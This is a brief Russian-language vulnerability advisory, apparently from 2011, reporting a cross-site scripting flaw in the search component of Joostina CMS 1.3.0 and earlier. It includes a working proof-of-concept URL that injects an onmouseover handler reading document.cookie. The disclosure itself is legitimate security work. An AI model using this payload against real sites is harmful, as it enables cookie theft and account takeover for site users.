Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25465
HistoryJan 07, 2011 - 12:00 a.m.

Cross-Site Scripting уязвимость в Joostina

2011-01-0700:00:00
vulners.com
16

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Cross-Site Scripting
уязвимости в Joostina CMS.

Данная уязвимость подобна недавно найденной XSS
уязвимости в Joomla 1.0.x.

XSS (с MouseOverJacking):

http://site/index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22

Уязвимы Joostina 1.3.0 и предыдущие версии.

Дополнительная информация о данной уязвимости у меня на
сайте:
http://websecurity.com.ua/4818/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua